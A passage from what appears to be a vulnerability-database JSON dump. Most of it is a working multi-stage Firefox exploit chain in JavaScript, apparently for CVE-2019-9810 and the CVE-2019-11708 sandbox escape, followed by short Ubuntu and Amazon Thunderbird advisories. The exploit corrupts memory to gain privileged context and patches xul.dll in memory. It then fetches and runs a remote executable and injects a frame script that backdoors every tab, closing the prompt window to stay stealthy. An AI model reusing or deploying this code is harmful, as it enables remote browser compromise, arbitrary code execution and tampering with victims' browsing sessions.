Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\n return true;\n };\n\n const AddrOf = Obj => {\n AdjacentArray.hell_on_earth = Obj;\n // 0:000> dqs 1ae5716e76a0\n // 00001ae5`716e76a0 00001ae5`7167dfd0\n // 00001ae5`716e76a8 000010c5`8e73c6a0\n // 00001ae5`716e76b0 00000238`9334e790\n // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10\n // 00001ae5`716e76c0 fffa0000`00000000\n // 00001ae5`716e76c8 fff88000`00bbccdd\n // 0:000> !telescope 0x00002389334e790\n // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)\n const SlotOffset = Biggie2AdjacentSize - (3 * 2);\n const SlotsAddress = BigInt.fromUint32s(\n Biggie.slice(SlotOffset, SlotOffset + 2)\n );\n\n return BigInt.fromJSValue(ReadPtr(SlotsAddress));\n };\n\n //\n // Let's move the battle field to the TenuredHeap\n //\n\n const ArrayBufferLength = 10;\n const AB1 = new ArrayBuffer(ArrayBufferLength);\n const AB2 = new ArrayBuffer(ArrayBufferLength);\n const AB1Address = AddrOf(AB1);\n const AB2Address = AddrOf(AB2);\n\n dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);\n dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);\n WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);\n WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);\n\n if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {\n dbg('Corrupting the ArrayBuffers failed :(.');\n return false;\n }\n\n const Primitives = BuildPrimitives(AB1, AB2);\n Math.atan2(AB2);\n\n //\n // All right, time to clean up behind ourselves.\n // Let's fix AdjacentArray's size first (as we are using Biggie to do it).\n //\n\n Biggie[Biggie2AdjacentSize] = ArraySize;\n\n //\n // Let's fix Biggie's length as we are done with it.\n // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580\n // Detected xul.dll, using it as js module.\n // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array\n // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337\n // 11e6fa2f7580: js!js::TypedArrayObject: 
ByteLength: 5348\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0\n // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...})\n // @$smdump_jsvalue(0xfffe11e6fa2f7580)\n //\n // 0:000> !telescope 0x11e6fa2f7580\n // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\n // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\n // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)\n // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)\n // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)\n // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)\n //\n\n const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;\n Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));\n\n //\n // From there, we're kinda done - let's get god mode and fuck off.\n //\n\n GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);\n return true;\n}\n\n//\n// This function uses a `Sandbox` with a `System Principal` to be able to grab the\n// `docShell` object off the `window` object. 
Once it has it, it can grab the frame\n// `messageManager` that we need to trigger the sandbox escape.\n//\n\nfunction GetContentFrameMessageManager(Win) {\n function _GetDocShellFromWindow(Win) {\n return Win.docShell;\n }\n\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\n const Cu = Components.utils;\n const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());\n const Code = _GetDocShellFromWindow.toSource();\n Cu.evalInSandbox(Code, Sbx);\n const DocShell = Sbx._GetDocShellFromWindow(Win);\n Cu.nukeSandbox(Sbx);\n return DocShell.messageManager;\n}\n\n//\n// This function sends a 'Prompt:Open' message over the frame message manager IPC,\n// with an URI.\n//\n\nfunction PromptOpen(Uri) {\n const FrameMM = GetContentFrameMessageManager(window);\n const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });\n return Result;\n}\n\n//\n// This is the function that abuses the `Prompt:Open` message to re-exploit the parent\n// process and escape the sandbox.\n//\n\nfunction TriggerCVE_2019_11708() {\n PromptOpen(`${location.origin}?stage3`);\n}\n\n//\n// This is the function that gets written into the frame script the exploit drops\n// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a\n// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:\n// Services.mm.loadFrameScript('file://frame-script.js', true)\n// This should break in the `Browser Content Toolbox` debugger window.\n//\n\nfunction FrameScriptPayload() {\n function PimpMyDocument() {\n\n //\n // Don't infect doar-e and leave Cthulhu alone...\n //\n\n if(content.document.location.origin == 'https://doar-e.github.io' ||\n content.document.location.origin == 'http://localhost:8000') {\n return;\n }\n\n //\n // .. 
as well as don't play with non http origins (I've seen empty/null origins).\n //\n\n if(!content.document.location.origin.startsWith('http')) {\n return;\n }\n\n //\n // Time to party! Let's find every `A` tag and make them point to doar-e.\n // We also use this opportunity to make every `backgroundImage` / `backgroundColor`\n // style attributes to `none` / `transparent` to not hide the doar-e background.\n //\n\n for(const Node of content.document.getElementsByTagName('*')) {\n if(Node.tagName == 'A') {\n Node.href = 'https://doar-e.github.io/';\n continue;\n }\n\n Node.style.backgroundImage = 'none';\n Node.style.backgroundColor = 'transparent';\n }\n\n //\n // Change the background.\n //\n\n content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';\n }\n\n //\n // First we set an event handler to make sure to be invoked when a new `content`\n // is created. Keep in mind that we basically have ~three cases to handle:\n // 1/ We are getting injected in an already existing tab,\n // 2/ We are getting injected in a new tab,\n // 3/ A user clicks on a link and a new `content` gets created.\n // We basically want to have control over those three events. 
The below ensures\n // we get a chance to execute code for 2/.\n //\n\n addEventListener('DOMWindowCreated', FrameScriptPayload);\n dump(`Hello from: ${content.location.origin}\\n`);\n\n if(content.document != null && content.document.body != null) {\n\n //\n // Either the tab already existed in which case we already have a document which we\n // can play with...\n //\n\n PimpMyDocument();\n return;\n }\n\n //\n // ..Or it doesn't exist quite yet and we want to get a callback when it does.\n //\n\n content.addEventListener('load', PimpMyDocument);\n}\n\n//\n// This function drops a file (open + write + close) using the OSFile JS module.\n//\n\nfunction DropFile(Path, Content) {\n\n //\n // We expect either a string or a TypedArray.\n //\n\n const Encoder = new TextEncoder();\n const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;\n return OS.File.open(Path, {write: true, truncate: true})\n .then(File => {\n return Promise.all([\n // We return the File object in order to be able to use it in the\n // next `.then`. 
This allows us to chain the `write` and the `close`\n // without another level of deepness.\n File,\n File.write(ContentBuffer),\n ]);\n })\n .then((Results) => {\n const [File, _WrittenBytes] = Results;\n return File.close();\n });\n}\n\n//\n// This function drops / executes a payload binary, as well as inject a frame script\n// into every tabs.\n//\n\nfunction Payload() {\n\n //\n // Import a bunch of JS modules we will be using later.\n //\n\n const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\n\n //\n // First order of business, we create a first promise that downloads the payload\n // (aka Slime Shady), drops it in the profile directory and finally executes it.\n //\n\n const Dir = OS.Constants.Path.localProfileDir;\n const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');\n const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)\n .then((Response) => {\n\n //\n // We return the result as a TypedArray as this is what `DropFile`\n // expects for binary content.\n //\n\n return Response.arrayBuffer();\n })\n .then((Content) => {\n\n //\n // Time to drop the file now. Note that we return the promise so\n // the next `then` executes when the file has been successfully dropped.\n //\n\n dbg(`Payload downloaded.`);\n return DropFile(PayloadPath, new Uint8Array(Content));\n })\n .then(() => {\n\n //\n // At this point, we are ready to spawn the payload, let's do it!\n //\n\n dbg(`Creating the process.. ${PayloadPath}`);\n CreateProcessA(PayloadPath);\n })\n .catch(Ex => {\n console.log(`Exception in payload promise: ${Ex}`);\n });\n\n //\n // Second order of business is to backdoor the tabs. 
To do so, we drop a frame\n // script that we inject into every tabs.\n //\n\n const FramePayloadContent = `${FrameScriptPayload.toSource()}\n\nFrameScriptPayload();`;\n const ScriptPath = OS.Path.join(Dir, 'frame-script.js');\n const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)\n .then(() => {\n\n //\n // At this time we are ready to inject the frame script into the tabs.\n // Note that we need to drop the file locally / use the file:// scheme\n // so that the tabs accept to interpret the file (unfortunately,\n // remote ones are ignored).\n //\n\n dbg(`About to loadFrameScript: ${ScriptPath}`);\n Services.mm.loadFrameScript(`file://${ScriptPath}`, true);\n })\n .catch(Ex => {\n console.log(`Exception in frame payload promise: ${Ex}`);\n });\n\n\n //\n // Last but not least, we set up code to execute on completion of both the above\n // promises. You have to remember that at this point the modal window is still open\n // and blocks navigation / UI interaction, so we need to close it as soon as we can\n // to be as stealth as possible.\n // Just for kicks, we spawn a calculator when we're done because why not.\n //\n\n Promise.all([PayloadPromise, FramePayloadPromise])\n .then(() => {\n\n //\n // .. just for kicks.\n //\n\n CreateProcessA('c:\\\\windows\\\\system32\\\\calc.exe');\n\n //\n // Phew, we made it here let's close the window :).\n //\n\n window.close();\n })\n .catch(Ex => {\n console.log(`Exception in clean up promise: ${Ex}`);\n window.close();\n });\n}\n\n//\n// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()\n// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have\n// god mode. 
It's far from being the cleanest way, but this is the easiest way I found.\n//\n// nsresult nsSocketTransport::InitiateSocket() {\n// SOCKET_LOG((\"nsSocketTransport::InitiateSocket [this=%p]\\n\", this));\n// nsresult rv;\n// bool isLocal;\n// IsLocal(&isLocal);\n// if (gIOService->IsNetTearingDown()) {\n// return NS_ERROR_ABORT;\n// }\n// if (gIOService->IsOffline()) {\n// if (!isLocal) return NS_ERROR_OFFLINE;\n// } else if (!isLocal) {\n// if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&\n// !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {\n// nsAutoCString ipaddr;\n// RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);\n// netaddr->GetAddress(ipaddr);\n// fprintf_stderr(\n// stderr,\n// \"FATAL ERROR: Non-local network connections are disabled and a \"\n// \"connection \"\n// \"attempt to %s (%s) was made.\\nYou should only access hostnames \"\n// \"available via the test networking proxy (if running mochitests) \"\n// \"or from a test-specific httpd.js server (if running xpcshell \"\n// \"tests). \"\n// \"Browser services should be disabled or redirected to a local \"\n// \"server.\\n\",\n// mHost.get(), ipaddr.get());\n// MOZ_CRASH(\"Attempting to connect to non-local address!\");\n// }\n// }\n//\n\nfunction PatchInitiateSocket() {\n\n //\n // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket\n // so that it doesn't assert on us because we turned on testing features.\n // This is the assert we hit without the patch:\n //\n // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.\n // You should only access hostnames available via the test networking proxy\n // (if running mochitests) or from a test-specific httpd.js server (if running\n // xpcshell tests). 
Browser services should be disabled or redirected to a local\n // server.\n // (4014.82c): Break instruction exception - code 80000003 (first chance)\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:\n // 00007ff9`69a66372 cc int 3\n //\n // Here is the disasembly before:\n //\n // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\n // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\n // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)]\n //\n // And after:\n //\n // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\n // 00007ff9`3f9c55c6 90 nop\n // 00007ff9`3f9c55c7 90 nop\n // 00007ff9`3f9c55c8 90 nop\n // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\n //\n // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul\n // Evaluate expression: 1529286 = 00000000`001755c6\n //\n\n const PatchOffset = 0x001755c6n;\n const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());\n const PatchAddress = XulBase + PatchOffset;\n const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];\n PatchCode(PatchAddress, PatchContent);\n}\n\nfunction Main(Route) {\n\n //\n // One way to tell if we were successful with our data corruption is by checking\n // if we have access to the PrivilegeManager. 
If we do, it means we are running\n // with a privileged context, if not we don't.\n //\n\n const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;\n if(Route == '?stage1') {\n\n //\n // If we are asked to run stage1 with access to a privileged context, we skip\n // it and move on to stage2.\n //\n\n if(RunningFromPrivilegedJS) {\n return Main('?stage2');\n }\n\n //\n // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access\n // a privileged JS context.\n //\n\n if(!ExploitCVE_2019_9810()) {\n console.log('Failed :(');\n return;\n }\n\n //\n // Once we are done with the data corruption, we refresh the page to get access\n // to the privileged JS context. Moving on to stage2 \\o/.\n //\n\n location.replace(`${location.origin}/?stage2`);\n }\n\n if(Route == '?stage2') {\n\n //\n // At this point we expect to have access to a privileged JS context.\n // If we don't, it's probably bad news, so we'll just bail.\n //\n\n if(!RunningFromPrivilegedJS) {\n alert('problem');\n return;\n }\n\n //\n // Turn on privileges so that we can access the `Components` object.\n //\n\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\n\n\n //\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\n // to avoid Firefox being unhappy.\n //\n\n PatchInitiateSocket()\n\n //\n // Now that we have access to the privileged context, we are also able to talk\n // over the frame message manager IPC and trigger CVE-2019-11708 to escape the\n // exploit the parent process.\n //\n\n TriggerCVE_2019_11708();\n }\n\n if(Route == '?stage3') {\n\n //\n // We should now be running in the broker which means we can exploit CVE-2019-9810\n // to perform the same attack as in stage1 but this time in the parent process.\n //\n\n if(!ExploitCVE_2019_9810()) {\n console.log('Elevation failed, closing the window.');\n window.close();\n }\n\n //\n // If we are successful it means that by refreshing 
the page, we should have\n // access to the privileged JS context from the parent process.\n // This basically means full compromise and we move on to backdooring the tabs,\n // as well as dropping the payload.\n //\n\n location.replace(`${location.origin}/?final`);\n }\n\n if(Route == '?final') {\n\n //\n // All right, we start off by turning on privileges so that we can access `Components`\n // & cie.\n //\n\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\n\n //\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\n // to avoid Firefox being unhappy.\n //\n\n PatchInitiateSocket()\n\n //\n // We've worked hard to get here and it's time to drop the goodies :).\n //\n\n Payload();\n }\n}\n\nfunction Onload() {\n if(location.search != '') {\n Main(location.search);\n }\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:43:48", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "It was discovered that Thunderbird allowed PAC files to specify that \nrequests to localhost are sent through the proxy to another server. If \nproxy auto-detection is enabled, an attacker could potentially exploit \nthis to conduct attacks on local services and tools. (CVE-2018-18506)\n\nMultiple security issues were discovered in Thunderbird. If a user were \ntricked into opening a specially crafted website in a browsing context, \nan attacker could potentially exploit these to cause a denial of service, \nor execute arbitrary code. 
(CVE-2019-9788, CVE-2019-9790, CVE-2019-9791, \nCVE-2019-9792, CVE-2019-9795, CVE-2019-9796, CVE-2019-9810, CVE-2019-9813)\n\nA mechanism was discovered that removes some bounds checking for string, \narray, or typed array accesses if Spectre mitigations have been disabled. \nIf a user were tricked into opening a specially crafted website in a \nbrowsing context with Spectre mitigations disabled, an attacker could \npotentially exploit this to cause a denial of service, or execute \narbitrary code. (CVE-2019-9793)", "edition": 4, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "USN-3927-1", "href": "https://ubuntu.com/security/notices/USN-3927-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "**Issue Overview:**\n\nWhen proxy auto-detection is enabled, if a web server serves a Proxy Auto-Configuration (PAC) file or if a PAC file is loaded locally, this PAC file can specify that requests to the localhost are to be sent through the proxy to another server. This behavior is disallowed by default when a proxy is manually configured, but when enabled could allow for attacks on services and tools that bind to the localhost for networked behavior if they are accessed through browsing. 
([CVE-2018-18506](<https://access.redhat.com/security/cve/CVE-2018-18506>))\n\nType inference is incorrect for constructors entered through on-stack replacement with IonMonkey ([CVE-2019-9791](<https://access.redhat.com/security/cve/CVE-2019-9791>))\n\nImproper bounds checks when Spectre mitigations are disabled ([CVE-2019-9793](<https://access.redhat.com/security/cve/CVE-2019-9793>))\n\nUse-after-free when removing in-use DOM elements ([CVE-2019-9790](<https://access.redhat.com/security/cve/CVE-2019-9790>))\n\nIonmonkey type confusion with __proto__ mutations ([CVE-2019-9813](<https://access.redhat.com/security/cve/CVE-2019-9813>))\n\nIonMonkey MArraySlice has incorrect alias information ([CVE-2019-9810](<https://access.redhat.com/security/cve/CVE-2019-9810>))\n\nType-confusion in IonMonkey JIT compiler ([CVE-2019-9795](<https://access.redhat.com/security/cve/CVE-2019-9795>))\n\nUse-after-free with SMIL animation controller ([CVE-2019-9796](<https://access.redhat.com/security/cve/CVE-2019-9796>))\n\nMemory safety bugs fixed in Mozilla libraries ([CVE-2019-9788](<https://access.redhat.com/security/cve/CVE-2019-9788>))\n\nIonMonkey leaks JS_OPTIMIZED_OUT magic value to script ([CVE-2019-9792](<https://access.redhat.com/security/cve/CVE-2019-9792>))\n\n \n**Affected Packages:** \n\n\nthunderbird\n\n \n**Issue Correction:** \nRun _yum update thunderbird_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n src: \n thunderbird-60.6.1-1.amzn2.0.1.src \n \n x86_64: \n thunderbird-60.6.1-1.amzn2.0.1.x86_64 \n thunderbird-debuginfo-60.6.1-1.amzn2.0.1.x86_64 \n \n \n", "edition": 1, "modified": "2019-04-25T16:37:00", "published": "2019-04-25T16:37:00", "id": "ALAS2-2019-1195", "href": "https://alas.aws.amazon.com/AL2/ALAS-2019-1195.html", "title": "Critical: thunderbird", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}